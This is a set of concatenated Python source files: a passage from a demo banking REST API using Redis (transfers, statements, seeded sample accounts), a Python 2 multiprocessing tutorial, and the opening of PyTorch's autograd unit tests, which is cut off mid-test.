        print(str(exception.args))
        exit(1)
def handle_response(request, response, code, message, make_json=True):
    """Fill the standard envelope (response.code / response.message) in
    *response*, then either wrap it in a japronto JSON Response or hand the
    mutated dict straight back when make_json is falsy."""
    envelope = response['response']
    envelope['code'] = code
    envelope['message'] = message
    if make_json:
        return request.Response(json=response)
    return response
def generic(product, error_message, request, make_json=True, condition='OR'):
    """Generic GET search over a list of record dicts (*product*).

    Query-string args (minus `delete_query_strings`) filter the records:
    with no args the whole list is returned; otherwise records whose
    values match any arg value across `json_attributes` are kept, and
    with condition='AND' the result is further narrowed so every arg
    key/value must match. Credit-card records ('brand' key) get a fresh
    'next_payment_day' computed from their 'court_date' first.
    Returns via handle_response (HTTP JSON when *make_json* is true).
    """
    message = dict(response=dict(code=1, message="Something is wrong."))
    try:
        if request.method == 'GET':
            args = {}
            pre_args = request.query
            # Strip credential/OAuth keys before using args as filters.
            for k, v in pre_args.items():
                if k not in delete_query_strings:
                    args[k] = v
            # Refresh next_payment_day on credit-card records: the cut-off
            # day ('court_date') of this month (or next month / next year
            # if already past) plus 15 days.
            for item in product:
                if 'brand' in item:
                    today = datetime.today()
                    court_date = datetime(
                        today.year,
                        today.month,
                        item['court_date']
                    )
                    if court_date > datetime(today.year, today.month, 1):
                        next_payment_day = \
                            datetime(
                                today.year,
                                today.month,
                                item['court_date']
                            ) + timedelta(days=15)
                    else:
                        if today.month < 12:
                            next_payment_day = \
                                datetime(
                                    today.year,
                                    today.month + 1,
                                    item['court_date']
                                ) + timedelta(days=15)
                        else:
                            next_payment_day = \
                                datetime(
                                    today.year + 1,
                                    1,
                                    item['court_date']
                                ) + timedelta(days=15)
                    item['next_payment_day'] = next_payment_day
                    item['next_payment_day'] = item['next_payment_day'].strftime("%m/%d/%Y")
            if not args:
                return handle_response(request, message, 0, product, make_json)
            else:
                # Fall back to error_message if no arg key is searchable.
                content = error_message
                for k, v in args.items():
                    if k in json_attributes:
                        # NOTE(review): content is rebuilt per key, so the
                        # last searchable arg wins the OR pass — confirm
                        # that is intended.
                        content = []
                        for item in product:
                            if v in [
                                item[attribute] if attribute in item else ''
                                for attribute in json_attributes
                            ]:
                                content.append(item)
                if condition == 'AND':
                    # Narrow in place: every arg key must match exactly.
                    for k, v in args.items():
                        counter = len(content)
                        i = 0
                        while i < counter:
                            if content[i][k] != v:
                                content.remove(content[i])
                                counter -= 1
                            else:
                                i += 1
                return handle_response(request, message, 0, content, make_json)
        else:
            return handle_response(request, message, 2, "Method Not Allowed", make_json)
    except Exception as exception:
        message['response']['error'] = str(exception.args)
        return request.Response(json=message) if make_json else message
def debit(transaction):
    """Withdraw transaction['amount'] from the origin account or card.

    Mutates the matching record in the module-level ACCOUNTS /
    CREDIT_CARDS list and, on success, appends a movement record to
    MOVEMENTS. Returns True iff funds were available (loan accounts
    cannot be debited). A negative amount acts as a refund and is
    recorded as a CREDIT movement.
    """
    global MOVEMENTS
    result = 0
    before = 0
    successful = False
    if transaction['origin_type'] == 'ACCOUNTS':
        for a in ACCOUNTS:
            available_balance = Decimal(a['available_balance'])
            # Strictly-greater check: balance must exceed the amount.
            if a['number'] == transaction['origin'] and \
                    available_balance > transaction['amount'] and \
                    a['type'] != 'loan':
                before = a['available_balance']
                result = available_balance - transaction['amount']
                a['available_balance'] = '{0:.2f}'.format(result)
                successful = True
                break
    elif transaction['origin_type'] == 'CREDIT_CARDS':
        for a in CREDIT_CARDS:
            available_quota = Decimal(a['available_quota'])
            if a['number'] == transaction['origin'] and \
                    available_quota > transaction['amount']:
                before = a['available_quota']
                result = available_quota - transaction['amount']
                a['available_quota'] = '{0:.2f}'.format(result)
                successful = True
                break
    if successful:
        MOVEMENTS.append(
            {
                "transaction_id": transaction["id"],
                "date": transaction["date"],
                "account": transaction["origin"],
                "amount": str(transaction["amount"]),
                "description": transaction["description"],
                "before": before,
                "after": '{0:.2f}'.format(result),
                "type": "DEBIT" if transaction["amount"] > 0 else "CREDIT"
            }
        )
    return successful
def accredit(transaction):
    """Deposit transaction['amount'] into the target account or card.

    Mutates the matching ACCOUNTS / CREDIT_CARDS record and, on success,
    appends a CREDIT movement to MOVEMENTS. For 'loan' accounts the
    amount is subtracted instead (paying a loan reduces its balance).
    Returns True iff a matching target was found.
    """
    global MOVEMENTS
    result = 0
    before = 0
    successful = False
    if transaction['target_type'] == 'ACCOUNTS':
        for a in ACCOUNTS:
            if a['number'] == transaction['target']:
                before = a['available_balance']
                if a['type'] == 'savings':
                    result = Decimal(a['available_balance']) + transaction['amount']
                elif a['type'] == 'loan':
                    # Accrediting a loan pays it down.
                    result = Decimal(a['available_balance']) - transaction['amount']
                a['available_balance'] = '{0:.2f}'.format(result)
                successful = True
                break
    elif transaction['target_type'] == 'CREDIT_CARDS':
        for a in CREDIT_CARDS:
            if a['number'] == transaction['target']:
                before = a['available_quota']
                result = Decimal(a['available_quota']) + transaction['amount']
                a['available_quota'] = '{0:.2f}'.format(result)
                successful = True
                break
    if successful:
        MOVEMENTS.append(
            {
                "transaction_id": transaction["id"],
                "date": transaction["date"],
                "account": transaction["target"],
                "amount": str(transaction["amount"]),
                "description": transaction["description"],
                "before": before,
                "after": '{0:.2f}'.format(result),
                "type": "CREDIT"
            }
        )
    return successful
async def transfers(request):
    """POST endpoint: execute a FOUNDS_TRANSFER, DEBIT or CREDIT transaction.

    Builds a transaction record from the JSON body (amounts as Decimal),
    applies debit()/accredit() against the in-memory lists, records the
    transaction on success, and hands the changed lists to the serializer
    sub-process via the queue.
    """
    global TRANSACTIONS
    message = dict(
        response=dict(
            code=1,
            message="Sorry, your transaction can't be completed!"
        )
    )
    try:
        successful = False
        if request.method == 'POST':
            input_body = request.json
            transaction = {
                "id": str(uuid.uuid4()),
                "date": datetime.now().strftime("%m/%d/%Y, %H:%M:%S"),
                "type": input_body['type'],
                "origin": input_body['origin'],
                "origin_type": input_body['origin_type'],
                "target": input_body['target'],
                "target_type": input_body['target_type'],
                "description": input_body['description'],
                "amount": Decimal(input_body['amount'])
            }
            if input_body['type'] == 'FOUNDS_TRANSFER':
                if debit(transaction):
                    if accredit(transaction):
                        successful = True
                    else:
                        # Credit leg failed: compensate by debiting the
                        # negated amount, i.e. refunding the origin.
                        transaction['amount'] *= -1
                        debit(transaction)
            elif input_body["type"] == "DEBIT":
                successful = debit(transaction)
            elif input_body["type"] == "CREDIT":
                successful = accredit(transaction)
            if successful:
                transaction["amount"] = str(transaction["amount"])
                TRANSACTIONS.append(transaction)
                data = {
                    "data": ['ACCOUNTS', 'CREDIT_CARDS', 'MOVEMENTS', 'TRANSACTIONS'],
                    "lists": lists
                }
                # Persist the mutated lists asynchronously.
                queue.put(ujson.dumps(data))
                return handle_response(request, message, 0, "Transaction completed successfully!")
            else:
                # NOTE(review): the failure path also returns code 0; the
                # message carries the outcome — confirm that is intended.
                return handle_response(request, message, 0, "Sorry, your transaction can't be completed!")
        else:
            return handle_response(request, message, 2, "Method Not Allowed")
    except Exception as exception:
        return handle_response(
            request,
            message,
            1,
            "Sorry, your data is wrong. %s" % str(exception.args)
        )
def credit_cards_statement(request):
    """GET endpoint: build a statement for one credit card.

    Requires 'number' or ('brand' + 'customer_id') in the query string.
    Finds the card via generic(), gathers its movements between the last
    and next court (cut-off) days, and totals DEBITs minus CREDITs.
    """
    global CREDIT_CARDS
    global MOVEMENTS
    current_credit_card_movements = []
    message = dict(response=dict(code=1, message="Not enough arguments."))
    args = request.query
    try:
        if len(args) > 0 and ('number' in args or ('brand' in args and 'customer_id' in args)):
            response = generic(
                CREDIT_CARDS,
                'Wrong Credit Card Number',
                request,
                False,
                'AND'
            )['response']
            if response['code'] == 0 and len(response['message']) > 0:
                # First matching card wins.
                credit_card = response['message'][0]
                # Re-target the query at the movements list.
                # NOTE(review): deleting 'brand' raises KeyError when the
                # lookup was by 'number' only; the except below turns that
                # into a code-1 response — confirm this is intended.
                request.query["account"] = credit_card['number']
                del request.query["brand"]
                credit_card_movements = generic(
                    MOVEMENTS,
                    'Wrong Credit Card Number',
                    request,
                    False
                )['response']['message']
                # next_payment_day is court day + 15, so subtract 15 to
                # recover the next court (cut-off) day.
                next_court_day = datetime.strptime(
                    credit_card['next_payment_day'],
                    "%m/%d/%Y"
                ) - timedelta(days=15)
                last_court_day = add_months(next_court_day, -1)
                total_to_payment = Decimal("0.0")
                for movement in credit_card_movements:
                    movement_date = datetime.strptime(movement['date'].split(',')[0], "%m/%d/%Y")
                    if last_court_day < movement_date < next_court_day:
                        current_credit_card_movements.append(movement)
                        if movement['type'] == 'DEBIT':
                            total_to_payment += Decimal(movement['amount'])
                        elif movement['type'] == 'CREDIT':
                            total_to_payment -= Decimal(movement['amount'])
                return handle_response(
                    request,
                    message,
                    0,
                    {
                        "credit_card": credit_card["obfuscated"],
                        "last_court_day": last_court_day.strftime("%m/%d/%Y"),
                        "next_court_day": next_court_day.strftime("%m/%d/%Y"),
                        "total_to_payment": str(total_to_payment),
                        "next_payment_day": credit_card["next_payment_day"],
                        "movements": current_credit_card_movements
                    }
                )
        else:
            return handle_response(request, message, 1, 'Not enough arguments.')
    except Exception as e:
        return handle_response(
            request,
            message,
            1,
            "Sorry, your data is wrong. %s" % str(e.args)
        )
async def fill(request):
    """GET endpoint: seed demo accounts and credit cards for every customer.

    Runs only once (when lists['accounts'] is empty). Every customer gets
    a savings account and a Diners Club card; customers with odd ids also
    get a loan account and a Visa card. The seeded lists are queued for
    Redis serialization.
    """
    global lists
    message = dict(response=dict(code=1, message="Something is wrong."))
    try:
        if request.method == 'GET':
            if len(lists['accounts']) == 0:
                for customer in lists['customers']:
                    # Odd-id customers get the extra loan + Visa products.
                    if int(customer["id"]) % 2 != 0:
                        loan_account = {
                            "customer_id": customer["id"],
                            "number": str(random.randint(100000, 200000)),
                            "available_balance": '10000.00',
                            "alias": 'Crédito',
                            "type": "loan"
                        }
                        loan_account["obfuscated"] = ''.join(
                            [
                                'XXXX',
                                loan_account["number"][-2:]
                            ]
                        )
                        lists['accounts'].append(loan_account)
                        last_code = str(random.randint(5000, 6000))
                        credit_card = {
                            "customer_id": customer["id"],
                            "number": '-'.join(
                                [
                                    '4118',
                                    str(random.randint(7000, 8000)),
                                    str(random.randint(3000, 4000)),
                                    last_code
                                ]
                            ),
                            "obfuscated": ''.join(['4118-XXXX-XXXX-', last_code]),
                            "brand": "Visa Titanium",
                            "alias": 'Tarjeta de Crédito',
                            "available_quota": '3000.00',
                            "court_date": 1
                        }
                        lists['credit_cards'].append(credit_card)
                    # Every customer gets a savings account...
                    deposit_account = {
                        "customer_id": customer["id"],
                        "number": str(random.randint(100000, 200000)),
                        "available_balance": '1000.00',
                        "alias": 'Ahorros',
                        "type": "savings"
                    }
                    deposit_account["obfuscated"] = ''.join(
                        [
                            'XXXX',
                            deposit_account["number"][-2:]
                        ]
                    )
                    lists['accounts'].append(deposit_account)
                    # ...and a Diners Club card.
                    last_code = str(random.randint(5000, 6000))
                    credit_card = {
                        "customer_id": customer["id"],
                        "number": '-'.join(
                            [
                                '3608',
                                str(random.randint(670200, 880200)),
                                last_code
                            ]
                        ),
                        "obfuscated": ''.join(['3608-XXXXXX-', last_code]),
                        "brand": "Diners Club",
                        "alias": 'Tarjeta de Crédito',
                        "available_quota": '1500.00',
                        "court_date": 24
                    }
                    lists['credit_cards'].append(credit_card)
                data = {
                    "data": ['ACCOUNTS', 'CREDIT_CARDS'],
                    "lists": lists
                }
                # Persist the freshly seeded lists.
                queue.put(ujson.dumps(data))
                resp = handle_response(request, message, 0, 'Accounts & Credit Cards created!')
            else:
                resp = handle_response(request, message, 0, "Accounts & Credit Cards already exist!")
        else:
            resp = handle_response(request, message, 2, "Method Not Allowed")
    except Exception as exception:
        message['response']['error'] = str(exception.args)
        resp = request.Response(json=message)
    finally:
        # return-in-finally: always answers, even if a late error occurred.
        return resp
async def clear(request):
    """GET endpoint: flush the Redis database and empty all in-memory lists."""
    global lists
    message = dict(response=dict(code=1, message="Something is wrong."))
    try:
        if request.method == 'GET':
            # Wipe persisted state first, then the live lists.
            await conn.flushdb()
            [v.clear() for k, v in lists.items()]
            resp = handle_response(request, message, 0, 'FLUSH DB OK!')
        else:
            resp = handle_response(request, message, 2, "Method Not Allowed")
    except Exception as exception:
        message['response']['error'] = str(exception.args)
        resp = request.Response(json=message)
    finally:
        # return-in-finally: always answers, even if a late error occurred.
        return resp
async def customer_register(request):
    """POST endpoint: register a list of customers from the JSON body.

    Skips entries whose email already exists; new customers get a
    sequential string id. The updated CUSTOMERS list is queued for
    Redis serialization and a per-entry status string is returned.
    """
    global CUSTOMERS
    message = dict(response=dict(code=1, message="Sorry, your data is wrong."))
    response = ''
    try:
        if request.method == 'POST':
            input_body = request.json
            for i in input_body:
                user_exist = False
                for c in CUSTOMERS:
                    if c["email"] == i["email"]:
                        response += "Email %s already exist!" % i['email']
                        user_exist = True
                        break
                if not user_exist:
                    response += "".join(
                        [
                            i["name"],
                            ' ',
                            i["last_name"],
                            " your mail ",
                            i["email"],
                            " is registered."
                        ]
                    )
                    # Sequential id based on current list length.
                    i["id"] = str(len(CUSTOMERS) + 1)
                    CUSTOMERS.append(i)
                response += " | "
            data = {
                "data": ['CUSTOMERS'],
                "lists": lists
            }
            queue.put(ujson.dumps(data))
            message['response']['code'] = 0
            message['response']['message'] = response
            return request.Response(json=message)
        else:
            return handle_response(request, message, 2, "Method Not Allowed")
    except Exception as exception:
        message['response']['error'] = str(exception.args)
        return handle_response(request, message, 1, "Sorry, your data is wrong.")
def credit_cards(request, condition='OR'):
    """GET endpoint: search CREDIT_CARDS with OR (default) or AND matching.

    BUG FIX: `condition` was passed positionally, landing in generic()'s
    `make_json` parameter slot — the AND/OR mode never reached generic()
    and make_json received a string. Pass it by keyword so make_json keeps
    its default (True) and the condition is honored.
    """
    global CREDIT_CARDS
    return generic(CREDIT_CARDS, 'Wrong Account Id', request, condition=condition)
def customers(request):
    """GET endpoint: search the CUSTOMERS list via generic()."""
    global CUSTOMERS
    return generic(CUSTOMERS, 'Client not exist.', request)
def accounts(request):
    """GET endpoint: search the ACCOUNTS list via generic()."""
    global ACCOUNTS
    return generic(ACCOUNTS, 'Wrong Account Id', request)
def movements(request):
    """GET endpoint: search the MOVEMENTS list via generic()."""
    global MOVEMENTS
    return generic(MOVEMENTS, 'Wrong Account Id', request)
def transactions(request):
    """GET endpoint: search the TRANSACTIONS list via generic()."""
    global TRANSACTIONS
    return generic(TRANSACTIONS, 'Wrong Transaction Id', request)
def root(request):
    """Serve the static landing page as text/html."""
    with open('./static/index.html') as html_file:
        markup = html_file.read()
    return request.Response(text=markup, mime_type='text/html')
async def main():
    """Bootstrap: load persisted lists from Redis and start the serializer.

    Connects the module-level Redis pool, deserializes each list's items
    from Redis into the in-memory `lists` mapping, then launches the
    `serialize` sub-process fed by `queue`.
    """
    global lists
    global conn
    global redis_params
    try:
        # *** Deserialize data from redis *** #
        conn = await asyncio_redis.Pool.create(**redis_params)
        for k, v in lists.items():
            data = await conn.lrange(k, 0, -1)
            for i in data:
                # asyncio_redis lrange yields one awaitable per element.
                v.append(ujson.loads(await i))
        # *** Create serializer sub-process *** #
        p = Process(name='serializer', target=serialize, args=(queue,))
        p.start()
        print("Process SERIALIZER was created with PID: %s" % str(p.pid))
    except Exception as exception:
        # A re-entrant loop error is expected on re-run; anything else is
        # reported as a Redis connectivity problem.
        if exception.args[0] != "This event loop is already running":
            print(
                "Can't connect to REDIS Server %s PORT %s" %
                (redis_params['host'], redis_params['port'])
            )
        print(exception.args[0])
if __name__ == "__main__":
    # Bootstrap (Redis load + serializer sub-process), then register all
    # HTTP routes and start the server on the configured port.
    asyncio.run(main())
    rt.add_route('/', root)
    rt.add_route('/fill', fill)
    rt.add_route('/clear', clear)
    rt.add_route('/accounts', accounts)
    rt.add_route('/movements', movements)
    rt.add_route('/customers', customers)
    rt.add_route('/customers/register', customer_register)
    rt.add_route('/transactions', transactions)
    rt.add_route('/transfers', transfers)
    rt.add_route('/credit_cards', credit_cards)
    rt.add_route('/credit_cards/statement', credit_cards_statement)
    app.run(port=port)
|
multiproc_example.py | """Multiprocessing.
References
----------
http://docs.python.org/library/multiprocessing.html
http://blog.doughellmann.com/2009/04/pymotw-multiprocessing-part-1.html
http://broadcast.oreilly.com/2009/04/pymotw-multiprocessing-part-2.html
"""
# STDLIB
import multiprocessing
import os
# THIRD-PARTY
import numpy as np
# STSCI
from stsci.tools import mputil
def info(title):
    """Return a diagnostic string: *title*, module name, and process ids."""
    pieces = [title, 'module name: ' + __name__]
    if hasattr(os, 'getppid'):  # only available on Unix
        pieces.append('parent process: {}'.format(os.getppid()))
    pieces.append('process id: {}'.format(os.getpid()))
    return '\n'.join(pieces)
def greet(name):
    """Print process info and greet *name* (Python 2 print statements)."""
    print info('function greet')
    print 'hello', name
def example_1():
    """Spawn two greeter processes directly and join them by hand."""
    print info('main line')
    p1 = multiprocessing.Process(target=greet, args=('bob', ))
    p2 = multiprocessing.Process(target=greet, args=('jane', ))
    p1.start()
    p2.start()
    p1.join()
    p2.join()
def example_2():
    """Spawn the same greeters via stsci.tools.mputil with a CPU-sized pool."""
    print info('main line')
    pool_size = multiprocessing.cpu_count()
    jobs = [multiprocessing.Process(target=greet, args=(n,))
            for n in ('bob', 'jane')]
    mputil.launch_and_wait(jobs, pool_size)
def fill_arr(d, i, val):
    """Store *val* under key *i* in the shared mapping *d* (worker target)."""
    d.update({i: val})
def example_3():
    """Fill a Manager dict from workers, then broadcast values into an array."""
    pool_size = multiprocessing.cpu_count()
    mgr = multiprocessing.Manager()
    d = mgr.dict()
    jobs = [multiprocessing.Process(target=fill_arr, args=(d, i, i), name=i)
            for i in xrange(10)]
    mputil.launch_and_wait(jobs, pool_size)
    # Each dict value fills one column of the result array.
    a = np.zeros((20, 10))
    for key, val in d.items():
        a[:, key] = val
    print a
if __name__ == '__main__':
    # Run the three demos in sequence (Python 2 print statements).
    print '****** EXAMPLE 1'
    example_1()
    print '****** EXAMPLE 2'
    example_2()
    print '****** EXAMPLE 3'
    example_3()
|
test_autograd.py | # Owner(s): ["module: autograd"]
import contextlib
import gc
import io
import math
import os
import random
import sys
import tempfile
import threading
import time
import unittest
import uuid
import warnings
import operator
from copy import deepcopy
from collections import OrderedDict
from itertools import product
from operator import mul
from functools import reduce
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, record_function, emit_nvtx)
from torch.autograd.profiler_util import (_format_time, EventList, FunctionEvent, FunctionEventAvg)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing import make_tensor
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
slowTest, IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
disable_gc, gradcheck, gradgradcheck,
parametrize, instantiate_parametrized_tests)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing._internal.common_methods_invocations import mask_not_all_zeros
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipMeta)
from torch.testing._internal.common_dtype import get_all_dtypes
from torch.testing._internal.logging_tensor import no_dispatch
import pickle
def graph_desc(fn):
    """Render an autograd graph rooted at *fn* as a nested 'Name(child, ...)'
    string; a missing node renders as 'None'."""
    if fn is None:
        return 'None'
    children = [graph_desc(child) for child, _ in fn.next_functions]
    return '{}({})'.format(type(fn).__name__, ', '.join(children))
class TestAutograd(TestCase):
    def test_tensor_grad_warnings(self):
        """Accessing .grad warns on non-leaves unless retain_grad() is set."""
        dummy = torch.empty(1)
        with warnings.catch_warnings(record=True) as w:
            # Accessing .grad on leaf
            dummy.requires_grad_()
            foo = dummy.grad
            self.assertEqual(len(w), 0)
            # Accessing .grad on non-leaf
            dummy = dummy.clone()
            foo = dummy.grad
            self.assertEqual(len(w), 1)
            # Accessing .grad on non-leaf that retains gradients
            dummy.retain_grad()
            foo = dummy.grad
            self.assertEqual(len(w), 1)
    def _function_test(self, cls):
        """Helper: run cls.apply(x, 2, y), backprop with create_graph=True,
        check first-order grads, and return the leaf tensors (x, y)."""
        x = torch.randn(5, 5, requires_grad=True)
        y = torch.randn(5, 5, requires_grad=True)
        result = cls.apply(x, 2, y)
        go = torch.ones((), requires_grad=True)
        result.sum().backward(go, create_graph=True)
        self.assertEqual(x.grad, y + torch.ones(5, 5))
        self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
        # create_graph=True means the grads themselves are differentiable.
        self.assertIsNotNone(x.grad.grad_fn)
        self.assertIsNotNone(y.grad.grad_fn)
        return x, y
    def test_function(self):
        """Full custom-Function round trip including the double-backward graph."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, tensor1, pyscalar, tensor2):
                ctx.pyscalar = pyscalar
                ctx.save_for_backward(tensor1, tensor2)
                return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
            @staticmethod
            def backward(ctx, grad_output):
                var1, var2 = ctx.saved_tensors
                # NOTE: self is the test case here
                self.assertIsInstance(var1, torch.Tensor)
                self.assertIsInstance(var2, torch.Tensor)
                self.assertIsInstance(grad_output, torch.Tensor)
                return (grad_output + grad_output * var2, None,
                        grad_output * ctx.pyscalar + grad_output * var1)
        x, y = self._function_test(MyFunction)
        x_grad_desc = graph_desc(x.grad.grad_fn)
        y_grad_desc = graph_desc(y.grad.grad_fn)
        self.assertExpected(x_grad_desc, "x_grad_desc")
        self.assertExpected(y_grad_desc, "y_grad_desc")
    def test_once_differentiable(self):
        """@once_differentiable backward runs with grad disabled and yields an
        Error node in the double-backward graph."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, tensor1, pyscalar, tensor2):
                ctx.pyscalar = pyscalar
                ctx.save_for_backward(tensor1, tensor2)
                return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
            @staticmethod
            @once_differentiable
            def backward(ctx, grad_output):
                self.assertFalse(torch.is_grad_enabled())
                t1, t2 = ctx.saved_tensors
                return (grad_output + grad_output * t2, None,
                        grad_output * ctx.pyscalar + grad_output * t1)
        x, y = self._function_test(MyFunction)
        self.assertEqual(graph_desc(x.grad.grad_fn),
                         'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
        self.assertEqual(graph_desc(y.grad.grad_fn),
                         'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
    def test_function_returns_input(self):
        """Custom backward applies even when forward returns its input as-is."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x
            @staticmethod
            def backward(ctx, grad):
                return grad * 2
        for shape in [(1,), ()]:
            v = torch.ones(shape, requires_grad=True)
            MyFunction.apply(v).backward()
            self.assertEqual(v.grad, torch.full(shape, 2.))
            with torch.no_grad():
                v.grad.zero_()
            MyFunction.apply(v.clone()).backward()
            self.assertEqual(v.grad, torch.full(shape, 2.))
    def test_function_returns_undefined_tensor(self):
        """A None grad from backward must propagate as undefined (.grad is None)."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x * 2
            @staticmethod
            def backward(ctx, grad):
                return None
        # Test that undefined tensors returned from custom backward function
        # are propagated as undefined and not tensor full of zeroes
        x = torch.ones(1, requires_grad=True)
        MyFunction.apply(x).backward()
        self.assertIsNone(x.grad)
        MyFunction.apply(x ** 2).backward()
        self.assertIsNone(x.grad)
        MyFunction.apply(x).sum().backward()
        self.assertIsNone(x.grad)
        self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
    def test_materialize_grads(self):
        """Undefined incoming grads are materialized as zeros by default."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x
            @staticmethod
            def backward(ctx, grad):
                self.assertEqual(grad, torch.zeros(1))
                return grad
        x = torch.ones(1, requires_grad=True)
        # UndefinedGrad feeds an undefined gradient into the graph.
        torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
    def test_dont_materialize_grads(self):
        """set_materialize_grads(False) delivers undefined grads as None."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                ctx.set_materialize_grads(False)
                return x
            @staticmethod
            def backward(ctx, grad):
                self.assertIsNone(grad)
                return grad
        x = torch.ones(1, requires_grad=True)
        torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
    def test_legacy_function_deprecation_exception(self):
        """Non-static forward/backward (legacy Function API) must raise."""
        # Trigger exception
        class MyFunction(Function):
            def forward(self, x):
                return x
            def backward(self, grad_output):
                return grad_output
        # Check exception occurs
        with self.assertRaisesRegex(
                RuntimeError,
                'Legacy autograd function with non-static forward method is deprecated'):
            MyFunction()(torch.randn(3, 4))
    class SimulateBackwardError(Function):
        """Identity Function whose backward always raises — used by tests
        that exercise error propagation through the backward pass."""
        @staticmethod
        def forward(ctx, input):
            return input.clone()
        @staticmethod
        @once_differentiable
        def backward(ctx, input):
            raise Exception("Simulate error on backward pass")
    def test_custom_function_exception(self):
        """An exception raised inside a custom backward surfaces to the caller."""
        t1 = torch.rand((3, 3), requires_grad=True)
        t2 = torch.rand((3, 3), requires_grad=True)
        tmp = (t1 + t2) * (t1 + t2)
        t3 = TestAutograd.SimulateBackwardError.apply(tmp)
        with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
            t3.sum().backward()
    def test_custom_function_non_tensor_inputs_outputs(self):
        """Custom Functions may mix tensor and non-tensor inputs/outputs;
        non-tensor outputs receive None grads and pass through unchanged."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, t1, t2, scale, t3):
                t4 = t1 + t2 * t3
                t5 = t1 * t2 + t3
                t4 *= scale
                t5 *= scale
                # Save scale
                ctx.scale = scale
                ctx.save_for_backward(t1, t2, t3)
                return scale, t4, None, True, t5, "bar", t1
            @staticmethod
            @once_differentiable
            def backward(ctx, *grads):
                # Verify grads
                self.assertEqual(7, len(grads))
                self.assertIsNone(grads[0])
                self.assertIsNone(grads[2])
                self.assertIsNone(grads[3])
                self.assertIsNone(grads[5])
                scale = ctx.scale
                var1, var2, var3 = ctx.saved_tensors
                return (
                    grads[1] * scale + grads[4] * var2 * scale + grads[6],
                    grads[1] * var3 * scale + grads[4] * var1 * scale,
                    None,
                    grads[1] * var2 * scale + grads[4] * scale,
                )
        t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
        t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
        t3 = torch.rand(10, dtype=torch.double)
        scale = random.randint(0, 10)
        res = MyFunction.apply(t1, t2, scale, t3)
        self.assertEqual(scale, res[0])
        self.assertEqual((t1 + t2 * t3) * scale, res[1])
        self.assertEqual(None, res[2])
        self.assertEqual(True, res[3])
        self.assertEqual((t1 * t2 + t3) * scale, res[4])
        self.assertEqual("bar", res[5])
        self.assertEqual(t1, res[6])
        # Validate running backward.
        torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
        self.assertIsNotNone(t1.grad)
        self.assertIsNotNone(t2.grad)
        self.assertIsNone(t3.grad)
        # Test gradcheck
        def foo(t1, t2, t3):
            res = MyFunction.apply(t1, t2, scale, t3)
            return res[1], res[4], res[6]
        gradcheck(foo, (t1, t2, t3))
    def test_custom_function_no_tensors(self):
        """A custom Function with purely non-tensor inputs/outputs still works."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, t1, t2, scale, t3):
                t4 = t1 + t2 * t3
                t5 = t1 * t2 + t3
                t4 *= scale
                t5 *= scale
                return scale, t4, None, True, t5, "bar", t1
            @staticmethod
            @once_differentiable
            def backward(ctx, *args):
                return (args[0], args[1], None, args[2])
        t1 = random.random()
        t2 = random.random()
        t3 = random.random()
        scale = random.randint(0, 10)
        res = MyFunction.apply(t1, t2, scale, t3)
        self.assertEqual(scale, res[0])
        self.assertEqual((t1 + t2 * t3) * scale, res[1])
        self.assertEqual(None, res[2])
        self.assertEqual(True, res[3])
        self.assertEqual((t1 * t2 + t3) * scale, res[4])
        self.assertEqual("bar", res[5])
        self.assertEqual(t1, res[6])
    def test_invalid_gradients(self):
        """A backward returning a wrongly-shaped grad must raise at runtime."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x * 2
            @staticmethod
            def backward(ctx, grad_output):
                # Wrong shape on purpose: input is (5, 5), grad is (10,).
                return torch.randn(10, dtype=torch.float)
        with self.assertRaisesRegex(RuntimeError, 'expected shape'):
            input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
            MyFunction.apply(input).sum().backward()
    def test_unrelated_inputs(self):
        """gradcheck/gradgradcheck tolerate inputs unused by the function."""
        # test to ensure grad(grad)check runs successfully even if there is an
        # unrelated (but differentiable) inputs
        def my_function(x, y):
            return x * x
        x = torch.rand(10, dtype=torch.double, requires_grad=True)
        y = torch.rand(10, dtype=torch.double, requires_grad=True)
        gradcheck(my_function, (x, y))
        gradgradcheck(my_function, (x, y))
    def test_not_implemented_grad(self):
        """Backward through an op with no derivative raises NotImplementedError."""
        a = torch.rand(2, requires_grad=True)
        # if grad for nextafter ends up being implemented, this should be changed
        y = torch.nextafter(a, a).sum()
        with self.assertRaisesRegex(
                NotImplementedError,
                'the derivative for .* is not implemented'):
            y.backward()
    def test_not_implemented_fwad(self):
        """Forward-mode AD through an unsupported op raises NotImplementedError."""
        x = torch.randn(3)
        v = torch.rand(3)
        mat = torch.randn(2, 3)
        with fwAD.dual_level():
            dual_x = fwAD.make_dual(x, v)
            err_msg = r"Trying to use forward AD with .* that does not support it"
            hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
            with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
